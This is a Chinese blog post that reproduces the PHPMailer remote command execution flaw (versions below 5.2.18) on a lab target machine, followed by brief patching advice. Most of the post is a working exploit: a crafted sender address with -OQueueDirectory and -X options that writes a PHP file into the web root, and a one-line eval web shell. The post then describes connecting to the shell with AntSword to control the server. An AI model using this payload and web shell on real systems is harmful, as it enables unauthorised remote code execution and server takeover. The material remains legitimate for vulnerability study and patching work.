PHPMailer远程命令执行漏洞复现
2021/12/13 14:19:13
本文主要是介绍PHPMailer远程命令执行漏洞复现,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
PHPMailer远程命令执行漏洞复现
漏洞简介:
PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。
PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。
影响版本:
PHPMailer<5.2.18
环境搭建:
这里采用现成靶机
漏洞复现:
aaa
"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com
<?php @eval($_POST['thelostworld']); ?> 注意:(空格很严格)
发送邮件
显示发送不成功,其实已经发送成功
访问上传的shell文件,发现上传成功
蚁剑进行连接,获得后台
漏洞防御:
目前此漏洞已经修复,建议及时升级更新至PHPMailer 6.5.0。
下载链接:
https://github.com/PHPMailer/PHPMailer
通用安全建议:
对代码进行安全审计,尽早检测潜在的安全漏洞,并增强代码逻辑性。
对用户的输入进行过滤或转义,避免参数可控。
用户应定期更新软件、程序和应用程序,确保应用程序是最新的,以保护系统免受漏洞利用
这篇关于PHPMailer远程命令执行漏洞复现的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-19php8的协程和hyperf的协程有什么区别?-icode9专业技术文章分享
- 2024-12-19php8 的fiber是什么?-icode9专业技术文章分享
- 2024-12-05怎么在php8,1 里面开启 debug?-icode9专业技术文章分享
- 2024-12-05怎么在php8,1 里面开启 debug?-icode9专业技术文章分享
- 2024-11-29使用PHP 将ETH账户的资产汇集到一个账户
- 2024-11-23怎么实现安卓+php 热更新方案?-icode9专业技术文章分享
- 2024-11-22PHP 中怎么实现判断多个值是否为空、null 或者为 false?-icode9专业技术文章分享
- 2024-11-11开源 PHP 商城项目 CRMEB 二次开发和部署教程
- 2024-11-09怎么使用php在kaufland平台刊登商品?-icode9专业技术文章分享
- 2024-11-05PHP的抽象类和接口是什么,有什么区别-icode9专业技术文章分享